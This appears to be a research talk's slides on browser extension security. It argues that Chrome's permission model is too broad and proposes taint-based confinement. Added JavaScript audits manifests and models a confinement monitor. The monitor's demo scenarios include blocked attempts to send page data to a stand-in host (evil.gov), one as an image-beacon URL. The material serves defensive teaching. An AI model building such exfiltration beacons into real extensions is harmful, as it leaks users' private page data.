The Most Dangerous Code in the Browser
Stefan Heule, Devon Rifkin, Alejandro Russo, Deian Stefan
Modern web experience
[Diagram: core browser with web apps (NYTimes, Chase, …) and extensions (AdBlock, Evernote)]
Web app security
• Trust model: malicious code
• Apps are isolated according to same-origin policy
• Apps are constrained to Web APIs (e.g., DOM)
➤ They cannot access arbitrary files, devices, etc.
[Diagram labels: NYTimes, Chase, Web APIs, Core browser, ❌]
Extension security?
• Extensions need direct access to app DOMs
➤ They modify app style, content, behavior, …
• Extensions need privileged APIs
➤ To fetch/store cross-origin content, to read/modify history and bookmarks, to create new tabs, etc.
[Diagram labels: NYTimes, AdBlock, Core browser, Privileged APIs]
Chrome extension security model
• Trust model: extensions are benign-but-buggy
• Privilege separate extension: core and content
➤ Protects vulnerable extension from malicious apps
• Run extensions with least privilege
➤ Limits damage due to exploits
[Diagram labels: NYTimes, AdBlock]
Least privilege via permission system
• Extensions declare necessary permissions
• Users must grant permissions at install time
{
  "name": "AdBlock Plus",
  "version": "2.1.10",
  ...
  "permissions": [ "http://*/*", "https://*/*", "contextMenus" ],
  ...
}
What does mean?
• Can read and modify data on any site, regardless of what site you are visiting
• AdBlock must be a special case, right?
➤ 71.6% of top 500 extensions need this privilege!
[Diagram labels: NYTimes, AdBlock, chase.com]
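An added example (not from the slides): a check a reviewer can run over extension manifests to find the ones whose host access covers every site, as in the AdBlock Plus manifest shown earlier. The first sample uses the fields from that slide; the other two manifests and the function names are constructed for illustration.

```javascript
// Match patterns that cover every http(s) site (Chrome match-pattern syntax).
const ALL_SITES = /^(<all_urls>|(\*|https?):\/\/\*\/\*)$/;

// Host access can be declared in the permission lists or implied by
// content-script match lists (content scripts touch the page DOM directly).
function auditManifest(manifest) {
  const findings = [];
  for (const key of ["permissions", "host_permissions"]) {
    for (const p of manifest[key] || []) {
      if (typeof p === "string" && ALL_SITES.test(p)) findings.push(`${key}: ${p}`);
    }
  }
  for (const cs of manifest.content_scripts || []) {
    for (const m of cs.matches || []) {
      if (ALL_SITES.test(m)) findings.push(`content_scripts.matches: ${m}`);
    }
  }
  return { name: manifest.name, allSites: findings.length > 0, findings };
}

// Fraction of a manifest set that can read and change data on all sites.
function fractionWithAllSites(manifests) {
  const flagged = manifests.filter((m) => auditManifest(m).allSites).length;
  return manifests.length === 0 ? 0 : flagged / manifests.length;
}

// Sample input. The first entry uses the fields shown on the slide; the
// other two are constructed for this example.
const SAMPLES = [
  { name: "AdBlock Plus", version: "2.1.10",
    permissions: ["http://*/*", "https://*/*", "contextMenus"] },
  { name: "Constructed: single-site helper", version: "1.0",
    permissions: ["https://mail.example.com/*", "storage"] },
  { name: "Constructed: injects everywhere", version: "0.3",
    permissions: ["tabs"],
    content_scripts: [{ matches: ["<all_urls>"], js: ["inject.js"] }] },
];

for (const m of SAMPLES) {
  const r = auditManifest(m);
  console.log(`${r.allSites ? "ALL SITES" : "scoped   "}  ${r.name}`, r.findings);
}
console.log("fraction:", fractionWithAllSites(SAMPLES).toFixed(3));
```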
It gets worse with popularity
[Plot: x-axis “Top n extensions”; y-axes “Number of users (few days later)” and “Fraction that can read and change …”; series “# of users” and “% of n that can read and change all your data…”; annotation “Removed from Chrome Web Store”]
Problem with Chrome’s model
• Permission requests are meaningless
➤ Descriptions are broad and context-independent
• Model encourages principle of most privilege
➤ Extensions don’t auto-update if they need more privs
• Threat model is not realistic
➤ Chrome Web Store listed many malicious extensions
➤ Roughly 5% of Google users run malicious extensions
New extension-system goals
• Meaningful permission system
➤ Safe behavior should not require permission
➤ Permission requests should be content-specific
• Model should encourage least privilege
➤ Permissions should be fine-grained
➤ Incentivize safe extensions
• Threat model: extensions may be malicious
➤ Need to also protect user app data from extensions
How can we do this?
Insight: it is safe for an extension to read user data if it can’t arbitrarily disseminate it
➤ E.g., Google Mail Checker
➤ Taint the extension according to what it reads
➤ Confine code to protect user’s privacy
[Diagram labels: Checker (✗), gmail.com, evil.gov ❌]
Safely read and modify pages?
• Idea: tie extension script with app page
➤ Impose at least same-origin policy on extension
• Challenge: read data from page and leak it by injecting content into page’s DOM
• Solution: taint extension, write to isolated DOM
➤ Loads due to extension restricted: confined!
[Diagram labels: NYTimes, AdBlock, chase.com ❌]
Confinement: safe, too restricting
• Challenge: extensions need to “leak” data
➤ E.g., Evernote is used to save URL, page, etc.
➤ Reading DOM taints extension:
• Solution: declassification via sharing menu API
[Diagram labels: NYTimes, Evernote, evernote.com ❌; then NYTimes, Evernote, evernote.com]
Usable confinement via APIs
• Crypto API
➤ Convert tainted values to encrypted blobs (LastPass)
• Declarative CSS API
➤ Taint-oblivious styling changes
• Network filtering API
➤ Allow/deny network requests given regex (AdBlock)
• …
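A toy model of the confinement idea from the preceding slides, added here as an illustration and not the authors' implementation: reading a page taints the extension with that origin, tainted code may contact only that origin, and a share-menu action is the one path that releases data elsewhere. The class, its method names and the userChose flag are assumptions made for the example.

```javascript
// Toy reference monitor for one extension (illustrative names throughout).
class ConfinedExtension {
  constructor(name) {
    this.name = name;
    this.label = new Set(); // taint: origins whose data has been read
    this.audit = [];        // every decision the monitor makes
  }

  // Reading needs no permission; it only raises the label.
  readPage(origin, data) {
    this.label.add(origin);
    return data;
  }

  // Confinement rule: contact is allowed only when everything read so far
  // already belongs to the destination (label is empty or exactly {dest}).
  mayContact(dest) {
    return [...this.label].every((o) => o === dest);
  }

  request(dest, payload) {
    const allowed = this.mayContact(dest);
    this.audit.push({ ext: this.name, op: "request", dest, allowed });
    return allowed ? { sentTo: dest, payload } : null;
  }

  // Content written by the extension lands in an isolated DOM; a load it
  // triggers is checked like a direct request, so it cannot carry data out.
  loadFromInjected(url) {
    return this.request(new URL(url).origin, url) !== null;
  }

  // Declassification: only a user action in the browser's share menu
  // releases data. userChose stands for that trusted UI signal (assumption);
  // `kind` is what a permission message would name as leaving the page.
  share(dest, kind, payload, userChose) {
    const allowed = userChose === true;
    this.audit.push({ ext: this.name, op: "share", dest, kind, allowed });
    return allowed ? { sentTo: dest, kind, payload } : null;
  }
}

// Scenarios from the slides; page contents are constructed sample data.
function runScenarios() {
  const checker = new ConfinedExtension("Mail Checker");
  const inbox = checker.readPage("https://gmail.com", "3 unread");
  const poll = checker.request("https://gmail.com", "poll");  // allowed
  const leak = checker.request("https://evil.gov", inbox);    // blocked

  const adblock = new ConfinedExtension("AdBlock");
  adblock.readPage("https://chase.com", "balance: 100");
  const beacon = adblock.loadFromInjected("https://evil.gov/p.gif?d=100"); // blocked

  const clipper = new ConfinedExtension("Evernote");
  const page = clipper.readPage("https://nytimes.com", "<article>text</article>");
  const direct = clipper.request("https://evernote.com", page); // blocked
  const shared = clipper.share("https://evernote.com", "whole page", page, true);

  const audit = [...checker.audit, ...adblock.audit, ...clipper.audit];
  return { poll, leak, beacon, direct, shared, audit };
}

for (const entry of runScenarios().audit) console.log(JSON.stringify(entry));
```

In a browser the userChose signal would come from trusted UI rather than from an argument the extension controls; the parameter only stands in for it here.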
How can permissions be more meaningful?
• Many extensions can be safe by default
➤ Confinement protects user privacy
➤ Incentivize developers by making warnings rare
• To capture remaining models: need permissions
➤ Use declassification as guide for informing messages: what data is being “leaked”?
- E.g., URLs, page location, whole page, etc.
Summary
• Extensions: most dangerous code in the browser
➤ Third-party, unaudited, highly-privileged JavaScript
• Rethink extension security systems
➤ Need to protect user privacy from extensions
➤ Make user permission requests rare and clear
• One direction: confinement + new APIs
➤ Captures many extensions as “safe”, makes permission requests rare